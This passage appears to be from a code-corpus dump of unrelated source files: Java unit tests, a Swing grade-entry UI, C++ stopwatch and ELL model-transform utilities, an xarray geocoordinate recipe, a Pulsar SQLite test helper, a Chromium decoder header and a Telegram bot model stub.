assertEquals(m1, middleware);
}
@Test
public void findNotFoundTest() {
thrown.expect(NotFoundException.class);
thrown.expectMessage("Resource not found");
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(null);
Middleware middleware = service.find(1L, 1L);
assertEquals(m1, middleware);
}
@Test
public void listPageableTest() {
Mockito.when(apiRepository.findOne(Mockito.anyLong())).thenReturn(api);
Mockito.when(middlewareRepository.findAll(Mockito.any(Example.class), Mockito.any(Pageable.class))).thenReturn(getPageMiddleware());
MiddlewarePage middlewarePage = service.list(1L, new MiddlewareDTO(), new PageableDTO());
assertEquals(middlewareList, middlewarePage.getContent());
}
@Test
public void listTest() {
Mockito.when(apiRepository.findOne(Mockito.anyLong())).thenReturn(api);
Mockito.when(middlewareRepository.findAll(Mockito.any(Example.class))).thenReturn(middlewareList);
List<Middleware> middlewareListActual = service.list(1L, new MiddlewareDTO());
assertEquals(middlewareList, middlewareListActual);
}
@Test
public void deleteTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
service.delete(1L, 1L);
Mockito.verify(middlewareRepository, Mockito.times(1)).findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong());
}
@Test
public void deleteAllTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
Mockito.when(middlewareRepository.findByApiId(Mockito.anyLong())).thenReturn(middlewareList);
service.deleteAll(1L);
Mockito.verify(middlewareRepository, Mockito.times(1)).findByApiId(Mockito.anyLong());
}
@Test
public void updateTest() {
Mockito.when(middlewareRepository.findByApiIdAndId(Mockito.anyLong(), Mockito.anyLong())).thenReturn(middleware);
Mockito.when(middlewareRepository.findByApiIdAndVersion(Mockito.anyLong(), Mockito.anyString())).thenReturn(null);
middleware.setVersion("0.0.2");
Mockito.when(middlewareRepository.save(Mockito.any(Middleware.class))).thenReturn(middleware);
Middleware updated = service.update(1L, 1L, middlewareDTO);
assertEquals(middleware, updated);
}
private Page<Middleware> getPageMiddleware() {
return new Page<Middleware>() {
@Override
public int getTotalPages() {
return 0;
}
@Override
public long getTotalElements() {
return middlewareList.size();
}
@Override
public <S> Page<S> map(Converter<? super Middleware, ? extends S> converter) {
return null;
}
@Override
public int getNumber() {
return 0;
}
@Override
public int getSize() {
return middlewareList.size();
}
@Override
public int getNumberOfElements() {
return middlewareList.size();
}
@Override
public List<Middleware> getContent() {
return middlewareList;
}
@Override
public boolean hasContent() {
return !middlewareList.isEmpty();
}
@Override
public Sort getSort() {
return null;
}
@Override
public boolean isFirst() {
return false;
}
@Override
public boolean isLast() {
return false;
}
@Override
public boolean hasNext() {
return false;
}
@Override
public boolean hasPrevious() {
return false;
}
@Override
public org.springframework.data.domain.Pageable nextPageable() {
return null;
}
@Override
public org.springframework.data.domain.Pageable previousPageable() {
return null;
}
@Override
public Iterator<Middleware> iterator() {
return middlewareList.iterator();
}
};
}
}
| 5,064 |
378 |
<filename>src/com/njupt/sms/ui/HomeTeacher.java<gh_stars>100-1000
package com.njupt.sms.ui;
import com.njupt.sms.Session;
import com.njupt.sms.beans.Course;
import com.njupt.sms.beans.Grade;
import com.njupt.sms.beans.Student;
import com.njupt.sms.beans.Teacher;
import com.njupt.sms.utils.CourseUtils;
import com.njupt.sms.utils.GradeUtils;
import com.njupt.sms.utils.TeacherUtils;
import com.njupt.sms.utils.UICommonUtils;
import org.w3c.dom.ls.LSInput;
import javax.sound.midi.Soundbank;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import java.awt.event.*;
import java.beans.VetoableChangeListener;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
/**
* Created by jason on 9/2/15.
*/
public class HomeTeacher {
private JPanel homeTeacher;
private JButton exitButton;
private JTabbedPane tabbedPane1;
private JTable infoTable;
private JTable table2;
private JTable table3;
private JButton commitButton;
private JButton saveToDraftButton;
private JLabel welcomeNameLabel;
private JFrame frame;
private TeacherInfoModel teacherInfoModel;
private CourseInfoModel courseInfoModel;
private GradeInputModel gradeInputModel;
public void makeRightAble() {
saveToDraftButton.setEnabled(true);
commitButton.setEnabled(true);
table3.setEnabled(true);
}
public void makeRightDisable() {
saveToDraftButton.setEnabled(false);
commitButton.setEnabled(false);
table3.setEnabled(false);
}
public HomeTeacher() {
// 添加模型
teacherInfoModel = new TeacherInfoModel();
infoTable.setModel(teacherInfoModel);
courseInfoModel = new CourseInfoModel();
table2.setModel(courseInfoModel);
gradeInputModel = new GradeInputModel();
table3.setModel(gradeInputModel);
// saveToDraftButton.setEnabled(false);
// commitButton.setEnabled(false);
// table3.setEnabled(false);
frame = new JFrame("HomeTeacher");
frame.setContentPane(homeTeacher);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
// frame.pack();
UICommonUtils.makeFrameToCenter(frame);
frame.setVisible(true);
Teacher teacher = (Teacher) Session.userInfo;
welcomeNameLabel.setText(teacher.getName());
exitButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
new Login();
frame.dispose();
Session.userInfo = null;
}
});
table2.addMouseListener(new MouseAdapter() {
@Override
public void mouseClicked(MouseEvent e) {
// System.out.println(table2.getSelectedRow());
int courseId = Integer.parseInt(courseInfoModel.getValueAt(table2.getSelectedRow(), 0).toString().trim());
boolean useDraft = !courseInfoModel.getValueAt(table2.getSelectedRow(), 4).toString().equals("已提交");
if (useDraft) {
makeRightAble();
} else {
makeRightDisable();
}
gradeInputModel.setStudentByCourseId(courseId, useDraft);
super.mouseClicked(e);
}
});
saveToDraftButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
gradeInputModel.saveToDraft();
courseInfoModel.update();
}
});
commitButton.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
boolean flag = gradeInputModel.commitGrades();
if (flag == true) {
makeRightDisable();
courseInfoModel.update();
}
}
});
}
private class TeacherInfoModel extends AbstractTableModel {
Teacher teacher = (Teacher) Session.userInfo;
TeacherUtils teacherUtils = new TeacherUtils();
Map<String, Object> map = teacherUtils.findTeacherMapById(teacher.getId());
String[] columnStrings = {"id", "username", "password", "name", "phone", "email"};
String[] columnShowStrings = {"编号","用户名","密码","姓名","电话","邮箱"};
@Override
public int getRowCount() {
return 1;
}
@Override
public int getColumnCount() {
return map.size();
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
return map.get(columnStrings[columnIndex]);
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return columnIndex == 2 || columnIndex == 4 || columnIndex == 5;
}
@Override
public void setValueAt(Object aValue, int rowIndex, int columnIndex) {
super.setValueAt(aValue, rowIndex, columnIndex);
map.put(columnStrings[columnIndex], aValue);
save();
}
private void save() {
teacherUtils.saveTeacher(map);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
}
private class CourseInfoModel extends AbstractTableModel {
Teacher teacher = (Teacher) Session.userInfo;
private CourseUtils courseUtils = new CourseUtils();
private List<Map<String, Object>> list = getAllCourses();
String[] columnStrings = {"id","courseName","academicYear","term","commitStatus"};
String[] columnShowStrings = {"编号","课程名","所属学年","学期","提交状态"};
public void update() {
list = getAllCourses();
fireTableDataChanged();
}
private List<Map<String,Object>> getAllCourses() {
return courseUtils.findAllCoursesByTeacherId(teacher.getId());
}
@Override
public int getRowCount() {
//System.out.println(list);
return list.size();
}
@Override
public int getColumnCount() {
return columnStrings.length;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
return map.get(columnStrings[columnIndex]);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return false;
}
}
private class GradeInputModel extends AbstractTableModel {
private int courseId;
public int getCourseId() {
return courseId;
}
public void setCourseId(int courseId) {
this.courseId = courseId;
}
private CourseUtils courseUtils = new CourseUtils();
private GradeUtils gradeUtils = new GradeUtils();
private List<Map<String, Object>> list = new ArrayList<>();
String[] columnStrings = {"id","studentCode","name","score","courseId"};
String[] columnShowStrings = {"编号", "学号", "姓名", "成绩"};
public List<Map<String, Object>> getAllStudentByCourseId(int courseId, boolean useDraft) {
if (useDraft == true) {
return courseUtils.findAllStudentWithGradeDraftByCourseId(courseId);
} else {
return courseUtils.findAllStudentWithGradeByCourseId(courseId);
}
}
public boolean commitGrades() {
for (int i = 0; i < list.size(); i++) {
Map<String, Object> map = list.get(i);
if (map.get("score") == null || map.get("score") == "") {
JOptionPane.showMessageDialog(frame, "请将成绩填写完整后再提交", "提示", JOptionPane.INFORMATION_MESSAGE);
return false;
}
}
for (int i = 0; i < list.size(); i++) {
Map<String, Object> map = list.get(i);
gradeUtils.saveGrade(map);
courseUtils.commitCourseByCourseId(courseId);
}
return true;
}
/**
* 调用来设置table中的显示数据
*
* @param courseId
*/
public void setStudentByCourseId(int courseId, boolean useDraft) {
this.courseId = courseId;
list = getAllStudentByCourseId(courseId, useDraft);
fireTableDataChanged();
}
public void saveToDraft() {
for (int i = 0; i < list.size(); i++) {
gradeUtils.saveGradeToDraft(list.get(i));
}
courseUtils.draftCourseByCourseId(courseId);
setStudentByCourseId(courseId, true);
}
@Override
public int getRowCount() {
return list.size();
}
@Override
public int getColumnCount() {
return columnShowStrings.length;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
return map.get(columnStrings[columnIndex]);
}
@Override
public String getColumnName(int column) {
return columnShowStrings[column];
}
@Override
public boolean isCellEditable(int rowIndex, int columnIndex) {
return columnIndex == columnShowStrings.length - 1;
}
@Override
public void setValueAt(Object aValue, int rowIndex, int columnIndex) {
Map<String, Object> map = list.get(rowIndex);
map.put(columnStrings[columnIndex], aValue);
}
}
}
| 4,612 |
455 |
#include "Stopwatch.h"
#include "../TimeManager.h"
#include "../Logger.h"
namespace star
{
Stopwatch::Stopwatch()
: m_bPaused(false)
, m_bStarted(false)
, m_TimePairVec()
, m_Laps()
{
}
Stopwatch::Stopwatch(const Stopwatch & yRef)
: m_bPaused(yRef.m_bPaused)
, m_bStarted(yRef.m_bStarted)
, m_TimePairVec(yRef.m_TimePairVec)
, m_Laps(yRef.m_Laps)
{
}
Stopwatch::Stopwatch(Stopwatch && yRef)
: m_bPaused(std::move(yRef.m_bPaused))
, m_bStarted(std::move(yRef.m_bStarted))
, m_TimePairVec(std::move(yRef.m_TimePairVec))
, m_Laps(std::move(yRef.m_Laps))
{
}
Stopwatch::~Stopwatch()
{
}
Stopwatch & Stopwatch::operator=(const Stopwatch & yRef)
{
m_bPaused = yRef.m_bPaused;
m_bStarted = yRef.m_bStarted;
m_TimePairVec = yRef.m_TimePairVec;
m_Laps = yRef.m_Laps;
return * this;
}
Stopwatch & Stopwatch::operator=(Stopwatch && yRef)
{
m_bPaused = std::move(yRef.m_bPaused);
m_bStarted = std::move(yRef.m_bStarted);
m_TimePairVec = std::move(yRef.m_TimePairVec);
m_Laps = std::move(yRef.m_Laps);
return * this;
}
void Stopwatch::Start()
{
if(m_bStarted)
{
LOG(LogLevel::Warning, _T("Stopwatch::Start(): \
Stopwatch already running! Overwriting start time..."), STARENGINE_LOG_TAG);
}
m_TimePairVec.push_back(
std::make_pair(
TimeManager::GetInstance()->CurrentTime(),
Time()
)
);
m_bStarted = true;
m_bPaused = false;
}
void Stopwatch::Stop()
{
m_TimePairVec.back().second = TimeManager::GetInstance()->CurrentTime();
m_bPaused = true;
m_bStarted = false;
}
void Stopwatch::Reset()
{
m_TimePairVec.clear();
m_bStarted = false;
m_bPaused = false;
}
void Stopwatch::Lap()
{
m_Laps.push_back(GetTime());
}
const std::vector<Time> & Stopwatch::GetLapTimes() const
{
return m_Laps;
}
Time Stopwatch::GetTime()
{
Time totalTime;
if(m_bPaused)
{
m_TimePairVec.back().second = TimeManager::GetInstance()->CurrentTime();
}
for(const auto & time : m_TimePairVec)
{
totalTime += time.second - time.first;
}
return totalTime;
}
}
| 1,109 |
2,257 |
"""
.. _recipes.rasterio:
=================================
Parsing rasterio's geocoordinates
=================================
Converting a projection's cartesian coordinates into 2D longitudes and
latitudes.
These new coordinates might be handy for plotting and indexing, but it should
be kept in mind that a grid which is regular in projection coordinates will
likely be irregular in lon/lat. It is often recommended to work in the data's
original map projection (see :ref:`recipes.rasterio_rgb`).
"""
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
import numpy as np
from pyproj import Transformer
import xarray as xr
# Read the data
url = "https://github.com/mapbox/rasterio/raw/master/tests/data/RGB.byte.tif"
da = xr.open_rasterio(url)
# Compute the lon/lat coordinates with pyproj
transformer = Transformer.from_crs(da.crs, "EPSG:4326", always_xy=True)
lon, lat = transformer.transform(*np.meshgrid(da["x"], da["y"]))
da.coords["lon"] = (("y", "x"), lon)
da.coords["lat"] = (("y", "x"), lat)
# Compute a greyscale out of the rgb image
greyscale = da.mean(dim="band")
# Plot on a map
ax = plt.subplot(projection=ccrs.PlateCarree())
greyscale.plot(
ax=ax,
x="lon",
y="lat",
transform=ccrs.PlateCarree(),
cmap="Greys_r",
add_colorbar=False,
)
ax.coastlines("10m", color="r")
plt.show()
| 472 |
2,094 |
////////////////////////////////////////////////////////////////////////////////////////////////////
//
// Project: Embedded Learning Library (ELL)
// File: TransformData.cpp (utilities)
// Authors: <NAME>, <NAME>
//
////////////////////////////////////////////////////////////////////////////////////////////////////
#include "TransformData.h"
#include "DataUtils.h"
#include "ModelUtils.h"
#include <model/include/Map.h>
#include <passes/include/StandardTransformations.h>
#include <utilities/include/Logger.h>
#include <utilities/include/MemoryLayout.h>
#include <memory>
#include <vector>
#include <iostream>
namespace ell
{
using namespace model;
namespace
{
template <typename T1, typename T2>
std::vector<T1> CastVector(const std::vector<T2>& v)
{
auto size = v.size();
std::vector<T1> result(size);
for (size_t i = 0; i < size; ++i)
{
result[i] = static_cast<T1>(v[i]);
}
return result;
}
template <typename DataVector, typename LabelType>
void AddExample(UnlabeledDataContainer& dataset, const DataVector& example, const LabelType& label)
{
dataset.Add(CastVector<float>(example));
}
template <typename DataVector, typename LabelType>
void AddExample(BinaryLabelDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.push_back({ CastVector<float>(data), label });
}
template <typename DataVector, typename LabelType>
void AddExample(MultiClassDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.Add({ CastVector<float>(data), label });
}
template <typename DataVector, typename LabelType>
void AddExample(VectorLabelDataContainer& dataset, const DataVector& data, const LabelType& label)
{
dataset.push_back({ CastVector<float>(data), label });
}
template <typename ExampleType>
auto GetInput(const ExampleType& example)
{
return example.input;
}
template <typename ExampleType>
auto GetOutput(const ExampleType& example)
{
return example.output;
}
template <>
auto GetInput(const UnlabeledExample& example)
{
return example;
}
template <>
auto GetOutput(const UnlabeledExample& example)
{
return 0;
}
template <typename DataVectorType, typename Visitor>
void Visit(const DataVectorType& data, const utilities::MemoryLayout& layout, int currentDimension, int currentOffset, Visitor visitor)
{
auto offset = layout.GetOffset(currentDimension);
auto length = layout.GetActiveSize(currentDimension);
bool isInnerLoop = currentDimension == layout.NumDimensions() - 1;
for (int i = 0; i < length; ++i)
{
auto index = (i + offset) * layout.GetCumulativeIncrement(currentDimension);
if (isInnerLoop)
{
visitor(data[index + currentOffset]);
}
else
{
Visit(data, layout, currentDimension + 1, currentOffset + index, visitor);
}
}
}
template <typename DataVectorType, typename Visitor>
void Visit(const DataVectorType& data, const utilities::MemoryLayout& layout, Visitor visitor)
{
Visit(data, layout, 0, 0, visitor);
}
const OutputPortBase& AppendInputNode(Model& model, Port::PortType type, const PortMemoryLayout& layout)
{
switch (type)
{
case Port::PortType::smallReal:
{
return model.AddNode<InputNode<float>>(layout)->output;
break;
}
case Port::PortType::real:
{
return model.AddNode<InputNode<double>>(layout)->output;
break;
}
default:
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected input type for model. Should be double or float.");
break;
};
}
// Check if we can use cached data at the given port to compute submodel's output
bool IsValidCachePort(const OutputPortBase& begin, const OutputPortBase& end, const OutputPortBase& port)
{
if (&begin == &port || &end == &port)
{
return true;
}
if (&begin == &end)
{
return false;
}
auto node = end.GetNode();
for (auto input : node->GetInputPorts())
{
if (!IsValidCachePort(begin, input->GetReferencedPort(), port))
{
return false;
}
}
return true;
}
} // namespace
// prototypes
template <typename ElementType>
UnlabeledDataContainer TransformDataWithSubmodelImpl(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel);
template <typename DataContainerType, typename ElementType>
DataContainerType TransformDataInputsWithModelImpl(const DataContainerType& dataset, const OutputPort<ElementType>& output);
template <typename DatasetType>
double GetModelAccuracyImpl(const OutputPortBase& output, const DatasetType& testDataset);
template <typename ElementType, typename DatasetType>
double GetModelAccuracyImpl(const OutputPort<ElementType>& output, const DatasetType& testDataset);
std::unique_ptr<Map> GetMapForModel(const OutputPortBase& output, bool compile, model::IRMapCompiler& compiler);
std::unique_ptr<Map> GetMapForSubmodel(Submodel& submodel, bool compile, model::IRMapCompiler& compiler);
// implementation
UnlabeledDataContainer TransformDataWithSubmodel(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel, ModelOutputDataCache& dataCache, bool cacheResult)
{
using namespace logging;
auto submodelInputs = submodel.GetInputs();
auto submodelOutputs = submodel.GetOutputs();
// submodels with multiple inputs/outputs are too hairy for this function to deal with currently
if (submodelInputs.size() > 1 || submodelOutputs.size() > 1)
{
Log() << "Skipping caching for complex submodel" << EOL;
return TransformDataWithSubmodel(dataset, submodel);
}
auto submodelOutput = submodelOutputs[0];
const OutputPortBase* submodelInput = nullptr;
if (submodelInputs.size() > 0)
{
submodelInput = &(submodelInputs[0]->GetReferencedPort());
}
else
{
auto inputNode = GetInputNode(*submodelOutput);
submodelInput = &(inputNode->GetOutputPort());
}
// direct cache hit
if (dataCache.HasCachedData(submodelOutput))
{
Log() << "Direct cache hit for port " << submodelOutput->GetFullName() << EOL;
return dataCache.GetCachedData(submodelOutput);
}
auto transformDataset = std::cref(dataset);
auto transformSubmodel = submodel;
const OutputPortBase* cachedOutput = nullptr;
submodel.Visit([&dataCache, &submodelInput, &submodelOutput, &cachedOutput](const Node& node) {
for (auto output : node.GetOutputPorts())
{
// Check if we have cached data here, and if it's valid to use it
if (dataCache.HasCachedData(output))
{
if ((GetInputFanIn(*output, *submodelOutput) == 1) && (IsValidCachePort(*submodelInput, *submodelOutput, *output)))
{
Log() << "Considering cached output " << output->GetFullName() << EOL;
cachedOutput = output;
}
else
{
Log() << "Cached output " << output->GetFullName() << " is invalid" << EOL;
}
}
}
});
if (cachedOutput != nullptr)
{
ModelTransformer transformer;
TransformContext context;
// auto model = submodel.GetModel().ShallowCopy();
// We want the input port along the search path that the input node is connected to
auto originalInputReferences = GetInputReferences(*cachedOutput, *submodelOutput);
Submodel submodelMinusInput = { originalInputReferences, { submodelOutput } };
// Create a new model to copy the submodel to evaluate into it
// First add an input node we can feed the cached dataset into
Model transformModel;
const auto& newInput = AppendInputNode(transformModel, cachedOutput->GetType(), cachedOutput->GetMemoryLayout());
auto onto = std::vector<const OutputPortBase*>(originalInputReferences.size(), &newInput);
auto newSubmodel = transformer.CopySubmodelOnto(submodelMinusInput, transformModel, onto, context);
transformSubmodel = newSubmodel;
transformDataset = dataCache.GetCachedData(cachedOutput);
}
auto result = TransformDataWithSubmodel(transformDataset, transformSubmodel);
if (cacheResult && transformSubmodel.GetOutputs().size() == 1)
{
dataCache.SetCachedData(submodelOutput, result);
}
return result;
}
UnlabeledDataContainer TransformDataWithSubmodel(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel)
{
switch (submodel.GetOutputs()[0]->GetType())
{
case Port::PortType::smallReal:
{
return TransformDataWithSubmodelImpl<float>(dataset, submodel);
break;
}
case Port::PortType::real:
{
return TransformDataWithSubmodelImpl<double>(dataset, submodel);
break;
}
default:
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected output type for model. Should be double or float.");
break;
};
}
template <typename ElementType>
UnlabeledDataContainer TransformDataWithSubmodelImpl(const UnlabeledDataContainer& dataset, ell::model::Submodel& submodel)
{
return TransformDataWithModel(dataset, static_cast<const OutputPort<ElementType>&>(*submodel.GetOutputs()[0]));
}
template <typename ElementType>
UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename ElementType>
VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<ElementType>& output)
{
return TransformDataInputsWithModelImpl(dataset, output);
}
template <typename DataContainerType, typename ElementType>
DataContainerType TransformDataInputsWithModelImpl(const DataContainerType& dataset, const OutputPort<ElementType>& output)
{
const bool compile = true;
// This compiler stuff is here because compiled maps contain a reference to the module emitter inside the compiler.
// If we were to just return the compiled map from `GetMapForModel`, the compiler object within that function would
// disappear and we'd have a dangling reference.
passes::AddStandardTransformationsToRegistry();
MapCompilerOptions settings;
settings.compilerSettings.targetDevice.deviceName = "host";
settings.compilerSettings.allowVectorInstructions = true;
settings.compilerSettings.optimize = true;
model::ModelOptimizerOptions optimizerOptions;
optimizerOptions["fuseLinearFunctionNodes"] = true;
model::IRMapCompiler compiler(settings, optimizerOptions);
auto map = GetMapForModel(output, compile, compiler);
auto inputSize = map->GetInputSize(0);
DataContainerType result;
for (size_t i = 0; i < dataset.Size(); ++i)
{
auto example = dataset[i];
const auto& exampleData = GetInput(example);
std::vector<ElementType> input = CastVector<ElementType>(exampleData.ToArray());
if (input.size() != inputSize)
{
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "dataset has wrong number of elements -- expected " + std::to_string(inputSize) + ", but got " + std::to_string(input.size()));
}
auto pred = map->template Compute<ElementType>(input);
AddExample(result, pred, GetOutput(example));
}
return result;
}
std::unique_ptr<Map> GetMapForModel(const OutputPortBase& output, bool compile, model::IRMapCompiler& compiler)
{
Submodel submodel({ &output });
return GetMapForSubmodel(submodel, compile, compiler);
}
std::unique_ptr<Map> GetMapForSubmodel(Submodel& inputSubmodel, bool compile, model::IRMapCompiler& compiler)
{
TransformContext context;
ModelTransformer transformer;
const auto& output = *inputSubmodel.GetOutputs()[0];
auto newSubmodel = transformer.CopySubmodel(inputSubmodel, context);
const auto& newOutput = transformer.GetCorrespondingOutputs(output);
const auto& newNewOutput = RemoveSourceAndSinkNodes(newOutput);
Submodel submodel({ &newNewOutput });
auto prunedSubmodel = transformer.CopySubmodel(submodel, context);
const auto& prunedOutput = *prunedSubmodel.GetOutputs()[0];
auto inputNode = GetInputNode(prunedOutput);
if (!inputNode)
{
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Couldn't find input nodes in model");
}
Map map(prunedSubmodel.GetModel(), { { "input", inputNode } }, { { "output", prunedOutput } });
if (!compile)
{
return std::make_unique<Map>(map);
}
// Compile and optimize the model
// passes::AddStandardTransformationsToRegistry();
// MapCompilerOptions settings;
// settings.compilerSettings.targetDevice.deviceName = "host";
// settings.compilerSettings.allowVectorInstructions = true;
// settings.compilerSettings.optimize = true;
// model::ModelOptimizerOptions optimizerOptions;
// optimizerOptions["fuseLinearFunctionNodes"] = true;
// model::IRMapCompiler compiler(settings, optimizerOptions);
auto compiledMap = compiler.Compile(map);
compiledMap.FinishJitting();
return std::make_unique<IRCompiledMap>(std::move(compiledMap));
}
double GetModelAccuracy(const OutputPortBase& output, const BinaryLabelDataContainer& testDataset)
{
return GetModelAccuracyImpl(output, testDataset);
}
double GetModelAccuracy(const OutputPortBase& output, const MultiClassDataContainer& testDataset)
{
return GetModelAccuracyImpl(output, testDataset);
}
template <typename DatasetType>
double GetModelAccuracyImpl(const OutputPortBase& output, const DatasetType& testDataset)
{
switch (output.GetType())
{
case Port::PortType::smallReal:
{
return GetModelAccuracyImpl<float>(static_cast<const OutputPort<float>&>(output), testDataset);
break;
}
case Port::PortType::real:
{
return GetModelAccuracyImpl<double>(static_cast<const OutputPort<double>&>(output), testDataset);
break;
}
default:
throw utilities::InputException(utilities::InputExceptionErrors::invalidArgument, "Unexpected output type for model. Should be double or float.");
break;
};
}
template <typename ElementType, typename DatasetType>
double GetModelAccuracyImpl(const OutputPort<ElementType>& output, const DatasetType& testDataset)
{
auto predictions = GetDatasetInputs(TransformDataInputsWithModel(testDataset, output));
return GetModelAccuracy(testDataset, predictions);
}
template <typename DataVectorType>
DataVectorType RemovePadding(const DataVectorType& data, const utilities::MemoryLayout& layout)
{
DataVectorType result(layout.NumElements());
int index = 0;
Visit(data, layout, [&result, &index](auto value) {
result[index] = value;
++index;
});
return result;
}
// Explicit instantiation definitions
template UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<float>& output);
template BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<float>& output);
template MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<float>& output);
template VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<float>& output);
template UnlabeledDataContainer TransformDataWithModel(const UnlabeledDataContainer& dataset, const OutputPort<double>& output);
template BinaryLabelDataContainer TransformDataInputsWithModel(const BinaryLabelDataContainer& dataset, const OutputPort<double>& output);
template MultiClassDataContainer TransformDataInputsWithModel(const MultiClassDataContainer& dataset, const OutputPort<double>& output);
template VectorLabelDataContainer TransformDataInputsWithModel(const VectorLabelDataContainer& dataset, const OutputPort<double>& output);
template std::vector<float> RemovePadding(const std::vector<float>& data, const utilities::MemoryLayout& layout);
template std::vector<double> RemovePadding(const std::vector<double>& data, const utilities::MemoryLayout& layout);
} // namespace ell
| 6,024 |
9,156 |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pulsar.io.jdbc;
import lombok.extern.slf4j.Slf4j;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
@Slf4j
public final class SqliteUtils {
static {
try {
Class.forName("org.sqlite.JDBC");
} catch (ClassNotFoundException | NoClassDefFoundError e) {
throw new RuntimeException(e);
}
}
public interface ResultSetReadCallback {
void read(final ResultSet rs) throws SQLException;
}
private final Path dbPath;
private Connection connection;
public Connection getConnection() {
return connection;
}
public SqliteUtils(String testId) {
dbPath = Paths.get(testId + ".db");
}
public String sqliteUri() {
return "jdbc:sqlite:" + dbPath;
}
public void setUp() throws SQLException, IOException {
Files.deleteIfExists(dbPath);
connection = DriverManager.getConnection(sqliteUri());
connection.setAutoCommit(false);
}
public void tearDown() throws SQLException, IOException {
connection.close();
Files.deleteIfExists(dbPath);
}
public void createTable(final String createSql) throws SQLException {
execute(createSql);
}
public void deleteTable(final String table) throws SQLException {
execute("DROP TABLE IF EXISTS " + table);
//random errors of table not being available happens in the unit tests
try {
Thread.sleep(100);
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
public int select(final String query, final ResultSetReadCallback callback) throws SQLException {
int count = 0;
try (Statement stmt = connection.createStatement()) {
try (ResultSet rs = stmt.executeQuery(query)) {
while (rs.next()) {
callback.read(rs);
count++;
}
}
}
return count;
}
public void execute(String sql) throws SQLException {
try (Statement stmt = connection.createStatement()) {
stmt.executeUpdate(sql);
connection.commit();
}
}
}
| 1,213 |
777 |
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
#define MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
#include "base/threading/thread_checker.h"
#include "media/base/video_decoder.h"
#include "media/gpu/media_gpu_export.h"
namespace media {
// An Android VideoDecoder that delegates to MediaCodec.
class MEDIA_GPU_EXPORT MediaCodecVideoDecoder : public VideoDecoder {
public:
MediaCodecVideoDecoder();
~MediaCodecVideoDecoder() override;
// VideoDecoder implementation:
std::string GetDisplayName() const override;
void Initialize(const VideoDecoderConfig& config,
bool low_delay,
CdmContext* cdm_context,
const InitCB& init_cb,
const OutputCB& output_cb) override;
void Decode(const scoped_refptr<DecoderBuffer>& buffer,
const DecodeCB& decode_cb) override;
void Reset(const base::Closure& closure) override;
bool NeedsBitstreamConversion() const override;
bool CanReadWithoutStalling() const override;
int GetMaxDecodeRequests() const override;
private:
DISALLOW_COPY_AND_ASSIGN(MediaCodecVideoDecoder);
};
} // namespace media
#endif // MEDIA_GPU_ANDROID_MEDIA_CODEC_VIDEO_DECODER_H_
| 510 |
1,283 |
package com.pengrad.telegrambot.model.request;
import java.io.Serializable;
public class InputInvoiceMessageContent extends InputMessageContent implements Serializable {
private final static long serialVersionUID = 0L;
private String title;
private String description;
